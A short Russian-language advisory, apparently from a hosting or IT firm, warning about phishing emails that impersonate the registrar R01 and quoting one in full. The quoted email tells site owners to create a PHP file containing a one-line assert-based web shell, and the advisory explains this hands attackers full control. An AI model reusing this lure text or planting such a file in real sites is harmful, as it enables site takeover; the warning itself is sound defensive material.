На текущей неделе несколько наших клиентов обратились к нам с просьбой прокомментировать письма, пришедшие им от имени регистратора доменных имен — компании «Регистратор R01», r01.ru. Причем получили такие письма даже те, кто не является потребителем их услуг.
Внешне письмо выглядит очень «качественно» и не вызывает сомнений у рядового потребителя: мошенники используют персональное обращение, указывают обратный адрес, применяют схожее с «оригиналом» оформление, термины, указывают на угрозу и ограничение времени.
Приведем текст письма полностью:
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом ХХХХ.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1cqtzdv6fnadsxc.php со следующим содержимым:
< ?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 30 января 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Что произойдет, если проделать операцию, описанную в этом письме? Попросту злоумышленники получат полный доступ к вашему сайту и смогут делать с ним все, что им будет угодно.
На сайте Регистратора отмечается:
Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.
Чтобы не стать жертвой мошенничества никогда не загружайте вложения и не устанавливайте внешние файлы, в случае малейших подозрений — уточняйте информацию в службе поддержки.
Будьте внимательны и крайне осторожны, не предпринимайте никаких действий без консультаций со специалистами!
Желаем всем безопасной работы!